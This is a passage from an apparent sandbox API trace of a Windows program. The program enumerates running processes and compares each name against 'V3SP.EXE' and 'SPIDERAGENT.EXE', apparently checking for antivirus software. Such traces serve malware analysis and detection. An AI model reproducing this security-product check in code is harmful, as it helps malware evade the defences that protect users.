cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.380] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3SP.EXE") returned -1 [0163.380] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.381] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.381] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.381] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.381] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3SP.EXE") returned -1 [0163.381] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.381] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.381] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.382] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.382] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3SP.EXE") returned -1 [0163.382] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.382] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.382] lstrlenW (lpString="isolation.exe") returned 13 [0163.382] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.382] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3SP.EXE") returned -1 [0163.382] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.383] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.383] lstrlenW (lpString="abc.exe") returned 7 [0163.383] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.383] lstrcmpW (lpString1="ABC.EXE", lpString2="V3SP.EXE") returned -1 [0163.383] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.384] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.384] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.384] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.384] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3SP.EXE") returned -1 [0163.384] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.385] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.385] lstrlenW (lpString="english_performing.exe") returned 22 [0163.385] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.385] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3SP.EXE") returned -1 [0163.385] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.385] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.385] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.385] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.385] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3SP.EXE") returned -1 [0163.385] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.386] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.386] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.386] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.386] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3SP.EXE") returned -1 [0163.386] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.387] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.387] lstrlenW (lpString="volume.exe") returned 10 [0163.387] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.387] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3SP.EXE") returned 1 [0163.387] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.388] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.388] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.388] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.388] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3SP.EXE") returned -1 [0163.388] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.388] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.388] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.388] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.388] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3SP.EXE") returned -1 [0163.388] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.389] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.389] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.389] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.389] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3SP.EXE") returned -1 [0163.389] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.390] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.390] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.390] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.391] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3SP.EXE") returned -1 [0163.391] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.392] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.392] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.392] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.392] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3SP.EXE") returned -1 [0163.392] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.392] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.393] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.393] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.393] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3SP.EXE") returned -1 [0163.393] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.393] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.393] lstrlenW (lpString="svchost.exe") returned 11 [0163.393] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.393] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.393] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.394] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.394] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.394] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.394] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3SP.EXE") returned -1 [0163.394] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.395] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.395] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.395] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.395] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3SP.EXE") returned -1 [0163.395] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.396] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.396] lstrlenW (lpString="svchost.exe") returned 11 [0163.396] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.396] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.396] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.396] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.396] lstrlenW (lpString="svchost.exe") returned 11 [0163.396] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.396] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.396] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.397] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.397] lstrlenW (lpString="winpoint.exe") returned 12 [0163.397] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.397] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3SP.EXE") returned 1 [0163.397] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.398] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.398] lstrlenW (lpString="cmd.exe") returned 7 [0163.398] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.398] lstrcmpW (lpString1="CMD.EXE", lpString2="V3SP.EXE") returned -1 [0163.398] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.399] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.399] lstrlenW (lpString="conhost.exe") returned 11 [0163.399] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.399] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.399] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.399] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.399] lstrlenW (lpString="PING.EXE") returned 8 [0163.399] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.399] lstrcmpW (lpString1="PING.EXE", lpString2="V3SP.EXE") returned -1 [0163.399] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.400] CloseHandle (hObject=0xe0) returned 1 [0163.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.402] lstrcpyW (in: lpString1=0x18f8e4, lpString2="SPIDERAGENT.EXE" | out: lpString1="SPIDERAGENT.EXE") returned="SPIDERAGENT.EXE" [0163.402] lstrlenW (lpString="SPIDERAGENT.EXE") returned 15 [0163.402] CharUpperBuffW (in: lpsz="SPIDERAGENT.EXE", cchLength=0xf | out: lpsz="SPIDERAGENT.EXE") returned 0xf [0163.402] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.403] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.403] lstrlenW (lpString="[System Process]") returned 16 [0163.403] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.403] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="SPIDERAGENT.EXE") returned -1 [0163.403] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.403] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.403] lstrlenW (lpString="System") returned 6 [0163.403] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.403] lstrcmpW (lpString1="SYSTEM", lpString2="SPIDERAGENT.EXE") returned 1 [0163.403] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.404] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.404] lstrlenW (lpString="smss.exe") returned 8 [0163.404] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.404] lstrcmpW (lpString1="SMSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.404] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.405] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.405] lstrlenW (lpString="csrss.exe") returned 9 [0163.405] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.405] lstrcmpW (lpString1="CSRSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.405] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.405] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.405] lstrlenW (lpString="wininit.exe") returned 11 [0163.405] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.406] lstrcmpW (lpString1="WININIT.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.406] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.406] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.406] lstrlenW (lpString="csrss.exe") returned 9 [0163.406] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.406] lstrcmpW (lpString1="CSRSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.406] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.407] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.407] lstrlenW (lpString="winlogon.exe") returned 12 [0163.407] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.407] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.407] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.408] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.408] lstrlenW (lpString="services.exe") returned 12 [0163.408] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.408] lstrcmpW (lpString1="SERVICES.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.408] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.408] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.408] lstrlenW (lpString="lsass.exe") returned 9 [0163.409] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.409] lstrcmpW (lpString1="LSASS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.409] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.409] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.409] lstrlenW (lpString="lsm.exe") returned 7 [0163.409] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.409] lstrcmpW (lpString1="LSM.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.409] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.410] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.410] lstrlenW (lpString="svchost.exe") returned 11 [0163.410] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.410] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.410] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.411] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.411] lstrlenW (lpString="svchost.exe") returned 11 [0163.411] 